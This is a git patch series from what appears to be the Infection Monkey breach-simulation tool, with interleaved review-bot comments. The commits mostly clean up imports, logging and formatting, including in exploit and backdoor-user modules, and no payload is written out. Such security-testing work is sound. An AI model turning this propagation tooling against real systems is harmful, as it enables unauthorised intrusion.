@@ -56,9 +56,9 @@ class NodeService: accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for exploit in edge["exploits"]: - exploit["origin"] = from_node_label - exploits.append(exploit) + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label + exploits.append(edge_exploit) exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) From fd70ecfe29980d0b44c2d4c38f56df17a3ec3de9 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:52 +0200 Subject: [PATCH 26/44] Intentional shadowing of builtins --- monkey/infection_monkey/monkeyfs.py | 1 + monkey/infection_monkey/system_info/__init__.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index b65443c76..e64682501 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -52,6 +52,7 @@ def virtual_path(name): return "%s%s" % (MONKEYFS_PREFIX, name) +# noinspection PyShadowingBuiltins def open(name, mode='r', buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index ab8e0f7ba..7d4395af7 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__) try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied __author__ = 'uri' From f8b38d9a8d6d5a4ce9f774c462a8c3f9e07074cb Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:05 +0200 Subject: [PATCH 27/44] Change is to isisntance for type checking --- monkey/infection_monkey/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6b01761d1..f3936fe19 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -74,7 +74,7 @@ class Configuration(object): val_type = type(value) - if val_type is types.FunctionType or val_type is types.MethodType: + if isinstance(val_type, types.FunctionType) or isinstance(val_type, types.MethodType): continue if val_type in (type, ABCMeta): From 719088070e752774e3b1d17a57c33f3ed81f4353 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:19 +0200 Subject: [PATCH 28/44] Added todo --- monkey/infection_monkey/system_info/windows_info_collector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 08ca6ff29..2c3696f44 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -35,7 +35,7 @@ class WindowsInfoCollector(InfoCollector): """ LOG.debug("Running Windows collector") super(WindowsInfoCollector, self).get_info() - #self.get_wmi_info() + # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration if WormConfiguration.should_use_mimikatz: From 6992902991de7189472a981bd5111c694da1e39f Mon Sep 17 00:00:00 2001 From: Shivank Date: Mon, 28 Oct 2019 22:53:07 +0530 Subject: [PATCH 29/44] JS File-saver dependency patch --- monkey/monkey_island/cc/ui/package.json | 1 - .../cc/ui/src/components/pages/ConfigurePage.js | 7 +++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index 4da085836..bc63bfccb 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json 
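Review bot: The new condition in `config.py` can never be true: `val_type` is `type(value)`, so `isinstance(val_type, types.FunctionType)` asks whether a class object is a function, which is always False, whereas the replaced `val_type is types.FunctionType` was correct. Functions and methods on the configuration will therefore no longer be skipped here and fall through to the checks below (`if val_type in (type, ABCMeta):` and whatever follows outside the hunk). Either keep the identity test or test the value itself: `if isinstance(value, (types.FunctionType, types.MethodType)):`. The enclosing loop starts and ends outside the hunk.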
@@ -75,7 +75,6 @@ "fetch": "^1.1.0", "file-saver": "^2.0.2", "filepond": "^4.2.0", - "js-file-download": "^0.4.4", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", "moment": "^2.22.2", diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..a5aeae3ec 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import fileDownload from 'js-file-download'; +import FileSaver from "file-saver"; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,7 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - fileDownload(JSON.stringify(this.state.configuration, null, 2), 'monkey.conf'); + const JSONString = JSON.stringify(this.state.configuration, null, 2); + const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + + FileSaver.saveAs(blob, 'monkey.conf'); }; sendConfig() { From 797b6c58b9035431c4d6c42d5448e51f3933ba90 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:41:35 +0200 Subject: [PATCH 30/44] Removed some unused imports --- monkey/common/cloud/aws_service_test.py | 1 - monkey/infection_monkey/post_breach/actions/add_user.py | 1 - monkey/monkey_island/cc/environment/aws.py | 1 - monkey/monkey_island/cc/resources/version_update.py | 1 - monkey/monkey_island/cc/services/remote_run_aws.py | 1 - monkey/monkey_island/cc/services/reporting/report.py | 1 - .../cc/services/telemetry/zero_trust_tests/machine_exploited.py | 1 - 7 files changed, 7 deletions(-) 
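Review bot: The new lines in `ConfigurePage.js` use double quotes (`import FileSaver from "file-saver";`, `"text/plain;charset=utf-8"`) while the rest of the file, including the neighbouring imports in the first hunk, uses single quotes; keep the file consistent. The local `JSONString` would conventionally be `jsonString`. Since the blob holds the serialised configuration, `application/json;charset=utf-8` describes it more accurately than `text/plain` should anything downstream look at the type. `exportConfig` continues outside the second hunk.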
diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index 25d1b8b6e..ae9c4b5d3 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -3,7 +3,6 @@ from .aws_service import filter_instance_data_from_aws_response import json - __author__ = 'shay.nehmad' diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py index 09c8d4796..074e31460 100644 --- a/monkey/infection_monkey/post_breach/actions/add_user.py +++ b/monkey/infection_monkey/post_breach/actions/add_user.py @@ -13,4 +13,3 @@ class BackdoorUser(PBA): POST_BREACH_BACKDOOR_USER, linux_cmd=' '.join(linux_cmds), windows_cmd=windows_cmds) - diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index 797a395aa..18db5c376 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,6 @@ import monkey_island.cc.auth from monkey_island.cc.environment import Environment from common.cloud.aws_instance import AwsInstance -from Crypto.Hash import SHA3_512 __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 5b34f4206..b1fbfdf82 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -2,7 +2,6 @@ import flask_restful import logging from monkey_island.cc.environment.environment import env -from monkey_island.cc.auth import jwt_required from monkey_island.cc.services.version_update import VersionUpdateService __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 4ec1fd427..c81e0bc4a 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py 
@@ -1,6 +1,5 @@ import logging -from monkey_island.cc.services.config import ConfigService from common.cloud.aws_instance import AwsInstance from common.cloud.aws_service import AwsService from common.cmd.aws.aws_cmd_runner import AwsCmdRunner diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 01be940c4..6a44679a4 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,7 +12,6 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.edge import EdgeService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 454f3a7fe..59ba296cd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,5 +1,4 @@ from common.data.zero_trust_consts import * -from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From f430bfb940e07ee41a9badc1d13e9bc2362d4980 Mon Sep 17 00:00:00 2001 
From: Shay Nehmad Date: Mon, 28 Oct 2019 20:43:01 +0200 Subject: [PATCH 31/44] Changed info to debug in tests --- monkey/monkey_island/cc/models/test_monkey.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 5d81e0b1d..3c10ca7d7 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -142,7 +142,7 @@ class TestMonkey(IslandTestCase): cache_info_after_query_1 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_1.hits, 0) self.assertEqual(cache_info_after_query_1.misses, 1) - logger.info("1) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("1) ID: {} label: {}".format(linux_monkey.id, label)) self.assertIsNotNone(label) self.assertIn(hostname_example, label) @@ -150,7 +150,7 @@ class TestMonkey(IslandTestCase): # should be cached label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("2) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("2) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_2 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_2.hits, 1) self.assertEqual(cache_info_after_query_2.misses, 1) @@ -160,7 +160,7 @@ class TestMonkey(IslandTestCase): # should be a miss label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("3) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("3) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_3 = Monkey.get_label_by_id.storage.backend.cache_info() logger.debug("Cache info: {}".format(str(cache_info_after_query_3))) # still 1 hit only From 75bff2264925a9251bd403c10bbb0a82d24a97ee Mon Sep 17 00:00:00 2001 
From: Shay Nehmad Date: Mon, 28 Oct 2019 20:59:30 +0200 Subject: [PATCH 32/44] Changed import * to explicit imports --- monkey/common/network/segmentation_utils_test.py | 2 +- .../infection_monkey/exploit/tools/payload_parsing_test.py | 1 - monkey/infection_monkey/exploit/web_rce.py | 3 ++- monkey/infection_monkey/utils/users.py | 2 -- .../cc/models/zero_trust/test_aggregate_finding.py | 2 +- monkey/monkey_island/cc/models/zero_trust/test_finding.py | 2 +- .../cc/services/reporting/test_zero_trust_service.py | 7 ++++++- .../cc/services/reporting/zero_trust_service.py | 5 ++++- .../cc/services/telemetry/processing/__init__.py | 7 ------- .../cc/services/telemetry/processing/post_breach.py | 2 +- .../cc/services/telemetry/processing/processing.py | 3 ++- .../services/telemetry/zero_trust_tests/data_endpoints.py | 3 ++- .../telemetry/zero_trust_tests/machine_exploited.py | 2 +- 13 files changed, 21 insertions(+), 20 deletions(-) diff --git a/monkey/common/network/segmentation_utils_test.py b/monkey/common/network/segmentation_utils_test.py index 221f1d9bf..9dea1af19 100644 --- a/monkey/common/network/segmentation_utils_test.py +++ b/monkey/common/network/segmentation_utils_test.py @@ -1,4 +1,4 @@ -from common.network.network_range import * +from common.network.network_range import CidrRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 23358a290..315216d5f 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -29,4 +29,3 @@ class TestPayload(TestCase): array2[1] == "prefix5678suffix" and len(array2) == 2) assert test1 and test2 - 
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 1b5b9d75b..672861355 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -4,9 +4,10 @@ from posixpath import join from abc import abstractmethod from infection_monkey.exploit import HostExploiter -from infection_monkey.model import * from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.model import CHECK_COMMAND, ID_STRING, GET_ARCH_LINUX, GET_ARCH_WINDOWS, BITSADMIN_CMDLINE_HTTP, \ + POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT, CHMOD_MONKEY, RUN_MONKEY, MONKEY_ARG, DROPPER_ARG from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING diff --git a/monkey/infection_monkey/utils/users.py b/monkey/infection_monkey/utils/users.py index 68148d9e9..b2f29db85 100644 --- a/monkey/infection_monkey/utils/users.py +++ b/monkey/infection_monkey/utils/users.py @@ -6,5 +6,3 @@ def get_commands_to_add_user(username, password): linux_cmds = get_linux_commands_to_add_user(username) windows_cmds = get_windows_commands_to_add_user(username, password) return linux_cmds, windows_cmds - - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 161f064b2..59bf1aa66 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py 
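Review bot: The new multi-name import in `web_rce.py` uses backslash continuation for a two-line `from … import` list; the parenthesised form, `from infection_monkey.model import (CHECK_COMMAND, ID_STRING, …)`, is the PEP 8 recommendation and survives adding or reordering names without re-placing the backslash. The same applies to the longer lists added in `test_zero_trust_service.py` and `zero_trust_service.py` and to the import rewritten in `processing.py` further down in this patch.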
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index 3b9dcbf33..d61478641 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index d77e67aad..a43da8416 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py 
@@ -1,4 +1,9 @@
-from common.data.zero_trust_consts import *
+from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \
+ TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \
+ PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \
+ TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \
+ TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \
+ PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED
 from monkey_island.cc.models.zero_trust.finding import Finding
 from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
 from monkey_island.cc.testing.IslandTestCase import IslandTestCase
diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py
index 04f661b28..24bd81e0d 100644
--- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py
+++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py
@@ -1,5 +1,8 @@
 import json
-from common.data.zero_trust_consts import *
+
+from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \
+ PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \
+ TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY
 from monkey_island.cc.models.zero_trust.finding import Finding
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py
index 966877967..e69de29bb 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py
@@ -1,7 +0,0 @@
-# import all implemented hooks, for brevity of hooks.py file
-from .tunnel import process_tunnel_telemetry
-from .state import process_state_telemetry
-from .exploit import process_exploit_telemetry
-from .scan import process_scan_telemetry
-from .system_info import process_system_info_telemetry
-from .post_breach import process_post_breach_telemetry
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
index c64849905..b0e2eb8b7 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
@@ -1,5 +1,5 @@
+from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER
 from monkey_island.cc.database import mongo
-from common.data.post_breach_consts import *
 from monkey_island.cc.models import Monkey
 from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
index 36f75fdbd..f6ddcd970 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
@@ -1,6 +1,7 @@
 import logging
-from monkey_island.cc.services.telemetry.processing import *
+from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \
+ process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry
 logger = logging.getLogger(__name__)
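Review bot: The new explicit import in processing.py pulls `process_tunnel_telemetry`, `process_state_telemetry` and the other four hooks from the package `monkey_island.cc.services.telemetry.processing`, but the same commit empties that package's `__init__.py` (the hunk removes all seven lines and the new blob is e69de29bb, the empty file), which was the only place those names were re-exported from `.tunnel`, `.state`, `.exploit`, `.scan`, `.system_info` and `.post_breach`. With the package namespace empty, `from ...processing import process_tunnel_telemetry` cannot fall back to a submodule of that name and will raise ImportError as soon as processing.py is loaded, so the old star-import was replaced by something strictly less working. Import each hook from its own submodule instead, as sketched below; the rest of processing.py, where these names are used, is outside the hunk.
```python
import logging

from monkey_island.cc.services.telemetry.processing.exploit import process_exploit_telemetry
from monkey_island.cc.services.telemetry.processing.post_breach import process_post_breach_telemetry
from monkey_island.cc.services.telemetry.processing.scan import process_scan_telemetry
from monkey_island.cc.services.telemetry.processing.state import process_state_telemetry
from monkey_island.cc.services.telemetry.processing.system_info import process_system_info_telemetry
from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel_telemetry

# … unchanged: logger = logging.getLogger(__name__) …
```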
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py
index b4e0bb4ec..e6afcf088 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py
@@ -1,7 +1,8 @@
 import json
 from common.data.network_consts import ES_SERVICE
-from common.data.zero_trust_consts import *
+from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \
+ TEST_DATA_ENDPOINT_ELASTIC
 from monkey_island.cc.models import Monkey
 from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
 from monkey_island.cc.models.zero_trust.event import Event
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py
index 59ba296cd..fe0015576 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py
@@ -1,4 +1,4 @@
-from common.data.zero_trust_consts import *
+from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED
 from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
 from monkey_island.cc.models.zero_trust.event import Event
From d69976f4b5a5c0c2af2d2996c60eab5371fb54ac Mon Sep 17 00:00:00 2001
From: Shay Nehmad
Date: Mon, 28 Oct 2019 21:03:51 +0200
Subject: [PATCH 33/44] Fixed unresolved reference self.host instead of host
---
 monkey/infection_monkey/exploit/web_rce.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py
index 672861355..b894acf43 100644
--- a/monkey/infection_monkey/exploit/web_rce.py
+++ b/monkey/infection_monkey/exploit/web_rce.py
@@ -257,7 +257,7 @@ class WebRCE(HostExploiter):
 if 'No such file' in resp:
 return False
 else:
- LOG.info("Host %s was already infected under the current configuration, done" % str(host))
+ LOG.info("Host %s was already infected under the current configuration, done" % str(self.host))
 return True
 def check_remote_files(self, url):
@@ -285,7 +285,7 @@ class WebRCE(HostExploiter):
 """
 ports = self.get_open_service_ports(ports, names)
 if not ports:
- LOG.info("All default web ports are closed on %r, skipping", str(host))
+ LOG.info("All default web ports are closed on %r, skipping", str(self.host))
 return False
 else:
 return ports
@@ -462,7 +462,7 @@ class WebRCE(HostExploiter):
 """
 src_path = get_target_monkey(self.host)
 if not src_path:
- LOG.info("Can't find suitable monkey executable for host %r", host)
+ LOG.info("Can't find suitable monkey executable for host %r", self.host)
 return False
 # Determine which destination path to use
 dest_path = self.get_monkey_upload_path(src_path)
From 40494d3c3c2e3e2649685773cb316845c9242301 Mon Sep 17 00:00:00 2001
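Review bot: The corrected log call in the first hunk (old line 260) still formats eagerly with `%` and `str(self.host)`, so the message is built even when INFO is disabled and logging's own lazy formatting is bypassed, while the two sibling fixes in this commit pass the host as a logging argument. For consistency write `LOG.info("Host %s was already infected under the current configuration, done", self.host)`, and in the second hunk drop the `str()` under `%r` (it prints the host wrapped in quotes) so `LOG.info("All default web ports are closed on %r, skipping", self.host)` matches the third hunk. Separately, the `else` branch visible in the first hunk reports "already infected" and returns True for any response that merely lacks `'No such file'`, which presumably includes error output from the target; that pre-dates this commit but is worth a comment or a tighter check. Each of the three enclosing methods starts and ends outside its hunk.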
From: Shay Nehmad Date: Mon, 28 Oct 2019 21:11:05 +0200 Subject: [PATCH 34/44] Auto reformat all code --- monkey/infection_monkey/dropper.py | 2 +- monkey/infection_monkey/example.conf | 206 +++++++------- .../infection_monkey/exploit/elasticgroovy.py | 4 +- monkey/infection_monkey/exploit/mssqlexec.py | 7 +- monkey/infection_monkey/exploit/shellshock.py | 2 +- .../exploit/tools/exceptions.py | 2 - .../infection_monkey/exploit/tools/helpers.py | 2 +- .../exploit/tools/payload_parsing.py | 2 +- .../exploit/tools/smb_tools.py | 1 + monkey/infection_monkey/exploit/weblogic.py | 3 - .../infection_monkey/exploit/win_ms08_067.py | 10 +- monkey/infection_monkey/exploit/wmiexec.py | 1 - monkey/infection_monkey/model/__init__.py | 24 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/info.py | 1 - .../network/mssql_fingerprint.py | 1 - .../infection_monkey/network/tcp_scanner.py | 1 - .../post_breach/actions/users_custom_pba.py | 1 + monkey/infection_monkey/post_breach/pba.py | 2 +- .../post_breach/post_breach_handler.py | 1 + monkey/infection_monkey/pyinstaller_utils.py | 1 - .../system_info/linux_info_collector.py | 1 - .../system_info/windows_info_collector.py | 1 + .../system_info/wmi_consts.py | 1 - monkey/infection_monkey/system_singleton.py | 1 - monkey/infection_monkey/transport/__init__.py | 1 - monkey/infection_monkey/transport/tcp.py | 4 +- monkey/monkey_island/cc/app.py | 1 - monkey/monkey_island/cc/island_logger.py | 1 - .../cc/island_logger_default_config.json | 60 ++--- monkey/monkey_island/cc/main.py | 1 + monkey/monkey_island/cc/models/monkey.py | 1 + monkey/monkey_island/cc/models/test_monkey.py | 1 - .../cc/models/zero_trust/test_finding.py | 1 + .../cc/resources/attack/attack_config.py | 1 - .../monkey_island/cc/resources/local_run.py | 1 + monkey/monkey_island/cc/resources/monkey.py | 1 + monkey/monkey_island/cc/resources/netmap.py | 2 - .../cc/resources/pba_file_download.py | 1 + .../cc/resources/pba_file_upload.py | 1 + 
.../cc/resources/reporting/report.py | 9 +- .../cc/resources/representations_test.py | 12 +- .../cc/resources/telemetry_feed.py | 4 +- .../cc/resources/test/log_test.py | 1 - monkey/monkey_island/cc/server_config.json | 4 +- .../cc/services/attack/attack_report.py | 3 +- .../attack/technique_reports/T1003.py | 1 - .../attack/technique_reports/T1005.py | 1 - .../attack/technique_reports/T1016.py | 1 - .../attack/technique_reports/T1018.py | 1 - .../attack/technique_reports/T1021.py | 1 - .../attack/technique_reports/T1041.py | 1 - .../attack/technique_reports/T1059.py | 1 - .../attack/technique_reports/T1065.py | 1 - .../attack/technique_reports/T1075.py | 1 - .../attack/technique_reports/T1082.py | 23 +- .../attack/technique_reports/T1086.py | 1 - .../attack/technique_reports/T1090.py | 3 - .../attack/technique_reports/T1105.py | 1 - .../attack/technique_reports/T1110.py | 2 - .../attack/technique_reports/T1188.py | 1 - .../attack/technique_reports/T1210.py | 5 +- monkey/monkey_island/cc/services/config.py | 5 +- monkey/monkey_island/cc/services/database.py | 2 - .../monkey_island/cc/services/island_logs.py | 1 + .../cc/services/mimikatz_utils.py | 1 - .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 32 +-- .../cc/services/reporting/exporter_init.py | 1 + .../cc/services/reporting/test_pth_report.py | 3 - .../reporting/test_zero_trust_service.py | 2 +- .../telemetry/processing/post_breach.py | 1 - .../zero_trust_tests/segmentation.py | 8 +- .../cc/services/version_update.py | 1 - .../monkey_island/cc/services/wmi_handler.py | 2 - monkey/monkey_island/cc/ui/.babelrc | 10 +- monkey/monkey_island/cc/ui/.eslintrc | 12 +- monkey/monkey_island/cc/ui/karma.conf.js | 14 +- monkey/monkey_island/cc/ui/server.js | 14 +- .../src/components/attack/MatrixComponent.js | 64 ++--- .../components/attack/techniques/Helpers.js | 81 +++--- .../src/components/attack/techniques/T1003.js | 3 +- .../src/components/attack/techniques/T1005.js | 23 +- 
